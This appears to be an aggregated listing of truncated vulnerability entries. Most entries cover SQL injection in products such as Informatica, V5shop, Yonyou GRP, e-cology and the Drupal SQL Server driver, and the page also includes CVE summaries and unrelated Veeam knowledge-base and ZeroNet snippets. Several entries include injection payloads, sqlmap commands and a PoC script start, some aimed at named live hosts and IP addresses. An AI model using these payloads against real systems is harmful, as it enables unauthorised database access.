Informatica: [informatica.com] Blind SQL Injection

Hi guys! JSON POST parameter "docId" is vulnerable to Blind SQL Injection attack PoC Raw query POST /vtibin/RatingsCalculator/RatingsCalculator.asmx/CalculateRatings HTTP/1.1 User-Agent: Opera/9.80 Windows NT 6.1; WOW64 Presto/2.12.388 Version/12.17 Host: kb-test.informatica.com Accept-Language:...

SQL VSS Writer is missing: databases will be backed up in crash-consistent state and transaction log processing will be skipped

Challenge A job displays the warning: SQL VSS Writer is missing: databases will be backed up in crash-consistent state and transaction log processing will be skipped Solution Support Scope Please note that the warning message displayed by Veeam Backup & Replication is a courtesy notification...

Oracle MySQL Server: General Component Denial of Service Vulnerability

Oracle MySQL Server is an open source relational database management system. A security vulnerability in the MySQL Server: General component allows remote attackers to conduct denial of service attacks by submitting special requests...

V5shop 在cart.aspx处的参数spikeid存在SQL注入漏洞

举例： 通过谷歌搜索inurl:productpic.aspx,因为cart.aspx是需要登录才可以正常访问，但是注入的时候毫无影响。 案例： http://www.wolifu.com/cart.aspx?act=spikebuy&spikeid=3 D:\sqlmappython sqlmap.py -u "http://www.wolifu.com/cart.aspx?act=spikebuy&spik eid=3" -p "spikeid" | | 1.0-dev-nongit-20150806 | -| . | | | .'| . | || |||||,| | || ||...

用友GRP系统sql注射

简要描述： 用友GRP系统sql注射 详细说明： 用友GRP系统sql注射 链接：http://221.2.68.102:8888/R9iPortal/cm/cminfocontent.jsp?infoid=42 注射参数： Payload: infoid=-7911 UNION ALL SELECT 78,78,78,78,78,78,78,78,78,78,78,78, CHAR113+CHAR98+CHAR113+CHAR118+CHAR113+CHAR74+CHAR98+CHAR75+CHAR...

Design/Logic Flaw

IBM Tivoli Storage Manager for Databases: Data Protection for Microsoft SQL Server aka Spectrum Protect for Databases 5.5 before 5.5.6.2, 6.3 before 6.3.1.6, 6.4 before 6.4.1.8, and 7.1 before 7.1.4; Tivoli Storage Manager for Mail: Data Protection for Microsoft Exchange Server aka Spectrum Prote...

CVE-2015-7404

CVE-2015-7404 affects IBM Tivoli Storage Manager products (Databases for SQL Server, Mail for Exchange, and FlashCopy Manager) when application tracing is enabled. The root issue is that the Change TSM Password operation (changetsmpassword) writes passwords in plaintext to application trace outpu...

CVE-2015-7404

IBM Tivoli Storage Manager for Databases: Data Protection for Microsoft SQL Server aka Spectrum Protect for Databases 5.5 before 5.5.6.2, 6.3 before 6.3.1.6, 6.4 before 6.4.1.8, and 7.1 before 7.1.4; Tivoli Storage Manager for Mail: Data Protection for Microsoft Exchange Server aka Spectrum Prote...

Multiple SQL Injection Vulnerabilities in Zend Framework MsSql and SQLite

Zend Framework is a set of open source PHP5 development framework , it is mainly used to develop Web programs and services . Multiple SQL injection vulnerabilities exist in Zend Framework MsSql and SQLite, allowing remote attackers to exploit the vulnerabilities to submit specially crafted SQL...

Drupal Arbitrary SQL Command Execution Vulnerability

Drupal is an open source content management platform. Arbitrary SQL command execution vulnerability exists in Drupal 7 driver for SQL Server SQL Azure versions 7.x-1.x prior to 7.x-1.4. Allows remote attackers to execute arbitrary SQL commandsvec execute arbitrary SQL commands...

CVE-2015-7876

The escapeLike function in sqlsrv/database.inc in the Drupal 7 driver for SQL Server and SQL Azure 7.x-1.x before 7.x-1.4 does not properly escape certain characters, which allows remote attackers to execute arbitrary SQL commands via vectors involving a module using the dblike function...

Sql injection

The escapeLike function in sqlsrv/database.inc in the Drupal 7 driver for SQL Server and SQL Azure 7.x-1.x before 7.x-1.4 does not properly escape certain characters, which allows remote attackers to execute arbitrary SQL commands via vectors involving a module using the dblike function...

CVE-2015-7876

CVE-2015-7876 concerns the Drupal 7 driver for SQL Server and SQL Azure (7.x-1.x prior to 7.x-1.4). The escapeLike function in sqlsrv/database.inc does not properly escape certain characters, enabling a remote attacker to execute arbitrary SQL commands via vectors involving a module using db_like...

CVE-2015-7876

The escapeLike function in sqlsrv/database.inc in the Drupal 7 driver for SQL Server and SQL Azure 7.x-1.x before 7.x-1.4 does not properly escape certain characters, which allows remote attackers to execute arbitrary SQL commands via vectors involving a module using the dblike function...

Release Notes for Veeam Backup & Replication 8.0 Update 3

More Recent Version Available Please find the latest version of Veeam Backup & Replication here: Veeam Downloads - Latest Version Challenge Release Notes for Veeam Backup & Replication 8.0 Update 3 Cause Please confirm you are running version 8.0.0.807, 8.0.0.817, 8.0.0.831, 8.0.0.917, 8.0.0.2018...

ZeroNet - Decentralized websites using Bitcoin crypto and BitTorrent network

Decentralized websites using Bitcoin crypto and the BitTorrent network - http://zeronet.io Why? We believe in open, free, and uncensored network and communication. No single point of failure: Site remains online so long as at least 1 peer serving it. No hosting costs: Sites are served by visitors...

Remote execution of a PowerShell script fails when the VeeamBackup SQL database is on a remote SQL Server.

Challenge When using a PowerShell script that is intended to remotely execute a command upon the Veeam server, it may fail if the SQL instance that Veeam Backup & Replication is configured to use is on a different server. This KB article applies only if the following two statements are true. 1. A...

e-cology 时间盲注（hpid参数）

1、缺陷文件homepage/LoginHomepage.jsp 2、注入参数：hpid3、涉及厂商：泛微软件4、证明：sqlmap.py -u "http://localhost/homepage/LoginHomepage.jsp?hpid=52" --technique T --dbms "Microsoft SQL Server"...

Drupal 7 driver for SQL Server and SQL Azure - Moderately Critical - SQL Injection - SA-CONTRIB-2015-148

Drupal 7 driver for SQL Server and SQL Azure module has a SQL injection vulnerability. Certain characters aren't properly escaped by the Drupal database API. A malicious user may be able to access restricted information by performing a specially-crafted search. Only sites that use contrib or cust...

狼邦内容管理系统SQL注入漏洞 /bssh

狼邦内容管理系统，版本目前是V8.0，开发语言: ASP.NET 4.0，数据库: SQL2005， 运行环境: Windows2003/NT系统+IIS6.0 ，主要应用于贵州或其它地区的政府、学校、企事业单位、个人网站建设。/Webwsfw/bssh/?subsite=1%20and%201select%20@@version-- !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils...